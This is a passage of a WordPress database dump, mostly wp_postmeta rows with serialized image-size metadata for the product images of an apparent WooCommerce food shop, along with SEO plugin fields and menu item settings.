udding-jelly-hd-png-download-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:88301;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10439;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-2-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2111;}s:6:\"medium\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-2-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-2-768x437.png\";s:5:\"width\";i:768;s:6:\"height\";i:437;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-2-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-2-600x341.png\";s:5:\"width\";i:600;s:6:\"height\";i:341;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-2-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-2-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3016,889,'_wp_attached_file','2022/02/252-2529007_pudding-jelly-hd-png-download-3.png'),(3017,889,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:860;s:6:\"height\";i:489;s:4:\"file\";s:55:\"2022/02/252-2529007_pudding-jelly-hd-png-download-3.png\";s:8:\"filesize\";i:480641;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-3-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:88301;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10439;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-3-50x28.png\";s:5:\"width\";i:50;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2111;}s:6:\"medium\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-3-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-3-768x437.png\";s:5:\"width\";i:768;s:6:\"height\";i:437;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-3-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-3-600x341.png\";s:5:\"width\";i:600;s:6:\"height\";i:341;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:55:\"252-2529007_pudding-jelly-hd-png-download-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-3-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:53:\"252-2529007_pudding-jelly-hd-png-download-3-48x27.png\";s:5:\"width\";i:48;s:6:\"height\";i:27;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3018,890,'_wp_attached_file','2022/02/Mango-Rasayana_finalforweb3-500x500-2.jpg'),(3019,890,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:49:\"2022/02/Mango-Rasayana_finalforweb3-500x500-2.jpg\";s:8:\"filesize\";i:29336;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13721;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2781;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:47:\"Mango-Rasayana_finalforweb3-500x500-2-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1188;}s:6:\"medium\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:47:\"Mango-Rasayana_finalforweb3-500x500-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:47:\"Mango-Rasayana_finalforweb3-500x500-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3020,891,'_wp_attached_file','2022/02/Mango-Rasayana_finalforweb3-500x500-3.jpg'),(3021,891,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:49:\"2022/02/Mango-Rasayana_finalforweb3-500x500-3.jpg\";s:8:\"filesize\";i:29336;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-3-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13721;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2781;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:47:\"Mango-Rasayana_finalforweb3-500x500-3-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1188;}s:6:\"medium\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-3-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:49:\"Mango-Rasayana_finalforweb3-500x500-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:47:\"Mango-Rasayana_finalforweb3-500x500-3-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:47:\"Mango-Rasayana_finalforweb3-500x500-3-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3034,900,'_edit_lock','1647334055:1'),(3035,900,'_edit_last','1'),(3036,900,'_aioseo_title','#post_title #separator_sa #site_title'),(3037,900,'_aioseo_description','#post_excerpt'),(3038,900,'_aioseo_keywords',''),(3039,900,'_aioseo_og_title',NULL),(3040,900,'_aioseo_og_description',NULL),(3041,900,'_aioseo_og_article_section',''),(3042,900,'_aioseo_og_article_tags',''),(3043,900,'_aioseo_twitter_title',NULL),(3044,900,'_aioseo_twitter_description',NULL),(3045,902,'_edit_lock','1644400643:1'),(3046,902,'_edit_last','1'),(3047,902,'_aioseo_title','#post_title #separator_sa #site_title'),(3048,902,'_aioseo_description','#post_content'),(3049,902,'_aioseo_keywords',''),(3050,902,'_aioseo_og_title',NULL),(3051,902,'_aioseo_og_description',NULL),(3052,902,'_aioseo_og_article_section',''),(3053,902,'_aioseo_og_article_tags',''),(3054,902,'_aioseo_twitter_title',NULL),(3055,902,'_aioseo_twitter_description',NULL),(3056,904,'_wp_attached_file','2022/02/download-1-1.jfif'),(3057,904,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:194;s:6:\"height\";i:259;s:4:\"file\";s:25:\"2022/02/download-1-1.jfif\";s:8:\"filesize\";i:8754;s:5:\"sizes\";a:6:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"download-1-1-100x100.jfif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3462;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"download-1-1-50x67.jfif\";s:5:\"width\";i:50;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1526;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"download-1-1-150x150.jfif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"download-1-1-100x100.jfif\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"download-1-1-48x64.jfif\";s:5:\"width\";i:48;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"download-1-1-48x64.jfif\";s:5:\"width\";i:48;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3058,905,'_tc_votes','1'),(3059,905,'_tc_rate','0'),(3060,905,'_tc_views','44'),(3061,905,'_thumbnail_id','904'),(3062,900,'_tc_votes','1'),(3064,908,'_menu_item_type','post_type'),(3065,908,'_menu_item_menu_item_parent','0'),(3066,908,'_menu_item_object_id','902'),(3067,908,'_menu_item_object','page'),(3068,908,'_menu_item_target',''),(3069,908,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(3070,908,'_menu_item_xfn',''),(3071,908,'_menu_item_url',''),(3074,905,'_edit_lock','1644396839:1'),(3075,915,'_wp_attached_file','2022/02/Artboard-3-8.png'),(3076,915,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2022/02/Artboard-3-8.png\";s:8:\"filesize\";i:80976;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"Artboard-3-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:102271;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"Artboard-3-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12587;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"Artboard-3-8-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3786;}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-3-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-3-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-3-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3077,917,'_wp_attached_file','2022/02/Artboard-1-8.png'),(3078,917,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2022/02/Artboard-1-8.png\";s:8:\"filesize\";i:42331;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"Artboard-1-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:57800;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"Artboard-1-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7937;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"Artboard-1-8-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2666;}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-1-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-1-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-1-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3079,918,'_wp_attached_file','2022/02/Artboard-2-8.png'),(3080,918,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2022/02/Artboard-2-8.png\";s:8:\"filesize\";i:49597;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"Artboard-2-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58695;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"Artboard-2-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8638;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"Artboard-2-8-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2830;}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-2-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-2-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-2-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3081,919,'_wp_attached_file','2022/02/Artboard-4-8.png'),(3082,919,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2022/02/Artboard-4-8.png\";s:8:\"filesize\";i:43150;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"Artboard-4-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51625;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"Artboard-4-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7301;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"Artboard-4-8-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2495;}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-4-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-4-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-4-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3083,920,'_wp_attached_file','2022/02/Artboard-5-8.png'),(3084,920,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2022/02/Artboard-5-8.png\";s:8:\"filesize\";i:56829;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"Artboard-5-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:68677;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"Artboard-5-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10096;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"Artboard-5-8-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3305;}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Artboard-5-8-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-5-8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Artboard-5-8-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"Artboard-5-8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-5-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"Artboard-5-8-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"a